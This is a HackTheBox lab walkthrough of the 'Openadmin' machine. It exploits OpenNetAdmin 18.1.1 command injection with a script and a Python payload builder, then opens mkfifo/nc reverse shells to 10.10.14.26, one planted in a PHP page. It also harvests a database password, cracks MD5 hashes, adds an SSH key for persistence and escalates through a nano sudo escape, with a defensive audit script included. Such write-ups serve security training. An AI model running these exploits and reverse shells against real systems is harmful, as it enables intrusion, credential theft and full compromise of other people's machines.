Openadmin
Contents
Ports scan
u505@kali:~/HTB/Machines/Openadmin$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.171
Starting masscan 1.0.5 at 2020-05-04 19:41:06 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
u505@kali:~/HTB/Machines/Openadmin$ nmap -sC -sV 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 15:41 EDT
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
Web server
Dirsearch
u505@kali:~/HTB/Machines/Openadmin$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r 1 -e "html,txt,js,php" -f -u http://openadmin.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: html, txt, js, php | HTTP method: get | Threads: 10 | Wordlist size: 22974 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-04_15-49-46.log
Target: http://openadmin.htb
[15:49:46] Starting:
[15:49:46] 403 -  278B - /.html
[15:49:46] 403 -  278B - /.php
[15:49:56] 200 -   14KB - /artwork/
[15:50:26] 403 -  278B - /icons/
[15:50:27] 200 -   11KB - /index.html
[15:50:40] 200 -   12KB - /music/
[15:51:00] 403 -  278B - /server-status/
[15:51:21] Starting: artwork/
[15:51:22] 403 -  278B - /artwork/.html
[15:51:22] 403 -  278B - /artwork/.php
[15:51:26] 200 -   11KB - /artwork/about.html
[15:51:35] 200 -   11KB - /artwork/blog.html
[15:51:42] 200 -    9KB - /artwork/contact.html
[15:51:44] 200 -    3KB - /artwork/css/
[15:51:55] 200 -    1KB - /artwork/fonts/
[15:52:02] 200 -    6KB - /artwork/images/
[15:52:03] 200 -   14KB - /artwork/index.html
[15:52:06] 200 -    5KB - /artwork/js/
[15:52:11] 200 -  931B - /artwork/main.html
[15:52:29] 200 -  410B - /artwork/readme.txt
[15:52:35] 200 -   11KB - /artwork/services.html
[15:52:37] 200 -   17KB - /artwork/single.html
[15:52:57] Starting: icons/
[15:52:57] 403 -  278B - /icons/.php
[15:52:57] 403 -  278B - /icons/.html
[15:54:05] 200 -   35KB - /icons/README.html
[15:54:13] 403 -  278B - /icons/small/
[15:54:32] Starting: music/
[15:54:32] 403 -  278B - /music/.html
[15:54:32] 403 -  278B - /music/.php
[15:54:45] 200 -    7KB - /music/blog.html
[15:54:48] 200 -   23KB - /music/category.html
[15:54:53] 200 -    6KB - /music/contact.html
[15:54:55] 200 -    2KB - /music/css/
[15:55:13] 200 -    3KB - /music/img/
[15:55:13] 200 -   12KB - /music/index.html
[15:55:17] 200 -    3KB - /music/js/
[15:55:22] 200 -  931B - /music/main.html
[15:55:34] 200 -    9KB - /music/playlist.html
[15:56:07] Starting: server-status/
Task Completed
Sites
These sites don't provide any useful information.
Openadmin
The Login link redirects to http://openadmin.htb/ona/
This application is OpenNetAdmin version 18.1.1.
Searchsploit shows that public exploits exist for this version.
u505@kali:~/HTB/Machines/Openadmin$ searchsploit opennetadmin
--------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metaspl | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | exploits/php/webapps/47691.sh
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
There is a shell script to exploit the vulnerability.
u505@kali:~/HTB/Machines/Openadmin$ searchsploit -m 47691
  Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47691
     Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Openadmin/47691.sh
But I used this Python script instead.
u505@kali:~/HTB/Machines/Openadmin$ wget -q https://raw.githubusercontent.com/amriunix/ona-rce/master/ona-rce.py
u505@kali:~/HTB/Machines/Openadmin$ python3 ona-rce.py check http://openadmin.htb/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!
u505@kali:~/HTB/Machines/Openadmin$ python3 ona-rce.py exploit http://openadmin.htb/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ whoami
www-data
The RCE works and opens a pseudo shell.
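What ona-rce.py (and EDB 47691) do under the hood: the OpenNetAdmin front page accepts an xajax call for the ping tooltip, and the `ip=>` argument is passed to a shell unescaped, so a command appended after a `;` runs as www-data. The script prints only what lands between BEGIN and END marker lines and discards the rest of the response. The following is an added example written for this page, not the page's ona-rce.py and not the Exploit-DB script; the field names and the marker scheme follow EDB 47691, the sample response is constructed, and `run_command` is the only function that touches the network.

```python
"""Request/response handling of the OpenNetAdmin 18.1.1 command injection
(EDB 47691), re-implemented as an added example for this write-up.
Assumption (from the public exploit, not from this page): the third
xajaxargs[] value 'ip=>...' of the tooltips/ping window is the injection
point, and BEGIN/END marker lines delimit the command output.
"""
import urllib.parse
import urllib.request

BEGIN, END = "BEGIN", "END"


def build_payload(cmd: str) -> bytes:
    """Return the URL-encoded POST body that injects `cmd` into the ping tooltip."""
    injected = f'ip=>;echo "{BEGIN}";{cmd};echo "{END}"'
    fields = [
        ("xajax", "window_submit"),
        ("xajaxr", "1574117726710"),  # nonce-like value; its content is irrelevant
        ("xajaxargs[]", "tooltips"),
        ("xajaxargs[]", injected),
        ("xajaxargs[]", "ping"),
    ]
    return urllib.parse.urlencode(fields).encode()


def extract_output(body: str) -> str:
    """Return the lines between the BEGIN and END marker lines, or '' if missing.

    Mirrors `sed -n '/BEGIN/,/END/p' | tail -n +2 | head -n -1` from the
    shell exploit: the marker lines themselves are dropped.
    """
    lines = body.splitlines()
    try:
        start = next(i for i, line in enumerate(lines) if BEGIN in line)
        stop = next(i for i in range(start + 1, len(lines)) if END in lines[i])
    except StopIteration:
        return ""
    return "\n".join(lines[start + 1:stop])


def run_command(base_url: str, cmd: str, timeout: float = 10.0) -> str:
    """POST the payload to the ONA front page (e.g. http://host/ona/) and return the output."""
    req = urllib.request.Request(
        base_url,
        data=build_payload(cmd),
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_output(resp.read().decode(errors="replace"))


# Constructed stand-in for the xajax XML the server returns when `whoami` ran.
SAMPLE_RESPONSE = (
    '<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="js"><![CDATA[\n'
    "BEGIN\nwww-data\nEND\n]]></cmd></xjx>"
)

if __name__ == "__main__":
    print(build_payload("whoami").decode())
    print(extract_output(SAMPLE_RESPONSE))
```

The marker trick is what makes the pseudo shell usable: the xajax response wraps the ping output in XML and JavaScript, and without the markers the caller would have to strip that noise by hand. A defender looking for this in Apache access logs should watch for POSTs to the ONA root whose body carries `xajaxargs[]=tooltips` together with shell metacharacters in the `ip=>` argument.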
Enumeration
Reverse shell
The pseudo shell is not very comfortable, so we use it to open a reverse shell.
u505@kali:~/HTB/Machines/Openadmin$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
With the listener up, we send the reverse shell command through the pseudo shell.
u505@kali:~/HTB/Machines/Openadmin$ python3 ona-rce.py exploit http://openadmin.htb/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 4444 >/tmp/f
^C[-] Warning: Error while connecting o the remote target
The listener receives the reverse shell, and we upgrade it to a PTY.
u505@kali:~/HTB/Machines/Openadmin$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:55728.
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@openadmin:/opt/ona/www$ stty raw -echo
Upload enumeration tools
u505@kali:~/HTB/Machines/Openadmin$ mkdir www
u505@kali:~/HTB/Machines/Openadmin$ cd www/
u505@kali:~/HTB/Machines/Openadmin/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Openadmin/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/Openadmin/www$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh ./
u505@kali:~/HTB/Machines/Openadmin/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.171 - - [04/May/2020 16:55:44] "GET / HTTP/1.1" 200 -
10.10.10.171 - - [04/May/2020 16:55:44] code 404, message File not found
10.10.10.171 - - [04/May/2020 16:55:44] "GET /robots.txt HTTP/1.1" 404 -
10.10.10.171 - - [04/May/2020 16:55:44] "GET /LinEnum.sh HTTP/1.1" 200 -
10.10.10.171 - - [04/May/2020 16:55:45] "GET /linpeas.sh HTTP/1.1" 200 -
10.10.10.171 - - [04/May/2020 16:55:45] "GET /pspy64 HTTP/1.1" 200 -
We download the tools into /tmp/ on the target.
www-data@openadmin:/tmp$ wget -q -r http://10.10.14.26/
www-data@openadmin:/tmp$ cd 10.10.14.26
www-data@openadmin:/tmp/10.10.14.26$ chmod +x *
The enumeration tools don't turn up anything useful.
Database config file
www-data@openadmin:/var/www/ona/local/config$ cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);
www-data@openadmin:/var/www/ona/local/config$ mysql -p -u ona_sys ona_default
Enter password: n1nj4W4rri0R!
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 105
Server version: 5.7.28-0ubuntu0.18.04.4 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select * from users;
+----+----------+----------------------------------+-------+---------------------+---------------------+
| id | username | password                         | level | ctime               | atime               |
+----+----------+----------------------------------+-------+---------------------+---------------------+
|  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |     0 | 2020-05-04 21:06:14 | 2020-05-04 21:06:14 |
|  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |     0 | 2007-10-30 03:00:17 | 2007-12-02 22:10:26 |
+----+----------+----------------------------------+-------+---------------------+---------------------+
2 rows in set (0.00 sec)
I cracked both unsalted MD5 hashes, but the resulting passwords are of no use anywhere else on the box.
u505@kali:~/HTB/Machines/Openadmin$ cat mysql.hash
guest:098f6bcd4621d373cade4e832627b4f6
admin:21232f297a57a5a743894a0e4a801fc3
u505@kali:~/HTB/Machines/Openadmin$ hashcat -m 0 mysql.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...
u505@kali:~/HTB/Machines/Openadmin$ hashcat -m 0 mysql.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
guest:098f6bcd4621d373cade4e832627b4f6:test
admin:21232f297a57a5a743894a0e4a801fc3:admin
Pivot to user jimmy
The database password is reused as jimmy's system password.
www-data@openadmin:/tmp$ su - jimmy
Password: n1nj4W4rri0R!
jimmy@openadmin:~$ id uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
Internal web server
As www-data I had spotted the folder /var/www/internal but had no access to it. jimmy belongs to the internal group, so now I can read it.
jimmy@openadmin:~$ cd /var/www
jimmy@openadmin:/var/www$ ls -ltr
total 8
lrwxrwxrwx 1 www-data www-data 12 Nov 21 16:07 ona -> /opt/ona/www
drwxr-xr-x 6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx--- 2 jimmy internal 4096 May 4 21:39 internal
It contains PHP files. main.php reads Joanna's SSH private key and prints it to the page.
jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -l
total 16
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 341 May 4 21:32 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php
session_start();
if (!isset ($_SESSION['username'])) {
    header("Location: /index.php");
};
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Check the Apache configuration. The internal site listens only on localhost, and with mpm_itk its PHP runs as joanna, not as www-data.
www-data@openadmin:/etc/apache2/sites-enabled$ cat internal.conf
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

    <IfModule mpm_itk_module>
        AssignUserID joanna joanna
    </IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
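The security-relevant point of this configuration: mpm_itk makes everything under /var/www/internal execute as joanna, while the directory itself (drwxrwx--- jimmy internal) is writable by jimmy and by anyone in the internal group. Whoever can write to that DocumentRoot runs code as joanna, which is exactly what the next steps abuse. The following audit is an added example written for this page, not code from the box or from Apache: it parses the directives shown above and reports a DocumentRoot whose owner or writable group differs from the AssignUserID identity. The parser covers only ServerName, DocumentRoot and AssignUserID, the config text is the one from the page reproduced as constructed input, and `audit_path` is the only function that touches the real filesystem.

```python
"""Flag mpm_itk vhosts whose DocumentRoot can be written by someone other
than the AssignUserID user. Added example for this write-up; the directive
parsing is deliberately limited to what the page's internal.conf shows.
"""
import grp
import os
import pwd
import re
import stat
from dataclasses import dataclass

VHOST_RE = re.compile(r"<VirtualHost\b[^>]*>(.*?)</VirtualHost>", re.S | re.I)
DIRECTIVE_RE = re.compile(
    r"^\s*(DocumentRoot|AssignUserID|ServerName)\s+(.+?)\s*$", re.M | re.I
)


@dataclass
class VHost:
    server_name: str
    document_root: str
    run_user: str
    run_group: str


def parse_vhosts(config_text: str) -> list:
    """Extract ServerName, DocumentRoot and AssignUserID from each <VirtualHost>."""
    hosts = []
    for block in VHOST_RE.findall(config_text):
        fields = {name.lower(): value for name, value in DIRECTIVE_RE.findall(block)}
        if "assignuserid" not in fields or "documentroot" not in fields:
            continue  # without mpm_itk the vhost runs as the global Apache user
        user, group = fields["assignuserid"].split()[:2]
        hosts.append(VHost(fields.get("servername", "?"),
                           fields["documentroot"].strip('"'), user, group))
    return hosts


def docroot_findings(owner: str, group: str, mode: int,
                     run_user: str, run_group: str) -> list:
    """Explain how a DocumentRoot with these bits lets a non-run_user plant code.

    Any group write bit is reported, because every member of that group
    (not only run_user) could drop a PHP file that then executes as run_user.
    """
    findings = []
    if mode & stat.S_IWUSR and owner != run_user:
        findings.append(f"owner {owner} can write, but the vhost runs as {run_user}")
    if mode & stat.S_IWGRP:
        findings.append(f"group {group} can write; every member of it can plant code "
                        f"that runs as {run_user}:{run_group}")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit_path(vhost: VHost) -> list:
    """Stat the real DocumentRoot and resolve uid/gid to names (live use only)."""
    st = os.stat(vhost.document_root)
    owner = pwd.getpwuid(st.st_uid).pw_name
    group = grp.getgrgid(st.st_gid).gr_name
    return docroot_findings(owner, group, stat.S_IMODE(st.st_mode),
                            vhost.run_user, vhost.run_group)


# The page's internal.conf, reproduced as constructed parser input.
INTERNAL_CONF = """Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal
    <IfModule mpm_itk_module>
        AssignUserID joanna joanna
    </IfModule>
</VirtualHost>
"""

if __name__ == "__main__":
    for vh in parse_vhosts(INTERNAL_CONF):
        # `ls -l /var/www` on the box showed: drwxrwx--- jimmy internal internal
        for finding in docroot_findings("jimmy", "internal", 0o770, vh.run_user, vh.run_group):
            print(f"{vh.server_name} ({vh.document_root}): {finding}")
```

On a live host you would call `audit_path(vh)` instead of passing the ownership by hand; the expected clean state is a DocumentRoot owned by the AssignUserID user (or root) with no group or world write bit, so that no lower-privileged account can turn a file write into code execution as that user.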
I create an SSH tunnel as jimmy to reach the internal port from my machine.
u505@kali:~$ ssh -L 52846:127.0.0.1:52846 jimmy@openadmin.htb
jimmy@openadmin.htb's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon May  4 21:24:05 UTC 2020

  System load:  0.0               Processes:             134
  Usage of /:   49.8% of 7.81GB   Users logged in:       1
  Memory usage: 30%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon May  4 21:23:11 2020 from 10.10.14.26
When I request main.php through the tunnel, I am redirected to the login page. index.php only accepts jimmy with a hard-coded SHA-512 hash.
jimmy@openadmin:/var/www/internal$ cat index.php
...
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
    if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
        $_SESSION['username'] = 'jimmy';
        header("Location: /main.php");
    } else {
        $msg = 'Wrong username or password.';
    }
}
I could try to crack the hash, but jimmy can write to the DocumentRoot, so I simply create a copy of main.php without the session check.
jimmy@openadmin:/var/www/internal$ cp main.php main2.php
jimmy@openadmin:/var/www/internal$ cat main2.php
<?php
session_start();
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Requesting main2.php through the tunnel now prints the key.
The key is passphrase-protected. Again, I could try to crack the passphrase, but I control the source code and know it executes as joanna, so I open a reverse shell as joanna instead.
jimmy@openadmin:/var/www/internal$ cp main2.php main3.php
jimmy@openadmin:/var/www/internal$ vi main3.php
jimmy@openadmin:/var/www/internal$ cat main3.php
<?php session_start();
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('rm /tmp/h;mkfifo /tmp/h;cat /tmp/h|/bin/sh -i 2>&1|nc 10.10.14.26 4446 >/tmp/h');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
I start the listener, then request main3.php through the tunnel.
u505@kali:~/HTB/Machines/Openadmin$ rlwrap nc -lvnp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:34932.
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
joanna@openadmin:/var/www/internal$ stty raw -echo
joanna@openadmin:/var/www/internal$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
User Flag
joanna@openadmin:/var/www/internal$ cd /home/joanna
joanna@openadmin:/home/joanna$ cat user.txt
<USER_FLAG>
Escalation of privileges
To get a proper shell, I generate an SSH key pair and add the public key to Joanna's authorized_keys.
u505@kali:~/HTB/Machines/Openadmin$ ssh-keygen -h
Generating public/private rsa key pair.
Enter file in which to save the key (/home/u505/.ssh/id_rsa): u505
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in u505
Your public key has been saved in u505.pub
The key fingerprint is:
SHA256:0WXHoJ9bCk8kZLvDMgDbiCcNRna7zxrUuMaSFzBYNLg u505@kali
The key's randomart image is:
+---[RSA 3072]----+
| +O o o +o.      |
|.= * * + = ..    |
|..= * o . = .    |
|E = + . o = .    |
| = . S = + .     |
|  + = o = +      |
|   o * o +       |
|    + o          |
|     .           |
+----[SHA256]-----+
The public key:
u505@kali:~/HTB/Machines/Openadmin$ cat u505.pub
ssh-rsa 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 u505@kali
We append the public key to Joanna's authorized_keys from the reverse shell.
joanna@openadmin:/home/joanna/.ssh$ echo "ssh-rsa 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 u505@kali" >>authorized_keys
Now I log in as joanna over SSH.
u505@kali:~/HTB/Machines/Openadmin$ ssh -i u505 joanna@openadmin.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon May  4 22:32:34 UTC 2020

  System load:  0.0               Processes:             142
  Usage of /:   50.2% of 7.81GB   Users logged in:       1
  Memory usage: 30%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
joanna may run nano on /opt/priv as root without a password. Any editor that can execute commands or write arbitrary files is a full root escalation when allowed through sudo.
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
Root Flag
joanna@openadmin:~$ sudo /bin/nano /opt/priv
Inside nano, press Ctrl+R (Read File), then Ctrl+X (Execute Command), and at the "Command to execute:" prompt enter:
reset; sh 1>&0 2>&0
nano spawns the shell on its own terminal, running as root:
# clear
# bash
root@openadmin:~# cd /root
root@openadmin:/root# cat root.txt
<ROOT_FLAG>
Daniel Simao 19:01, 4 May 2020 (EDT)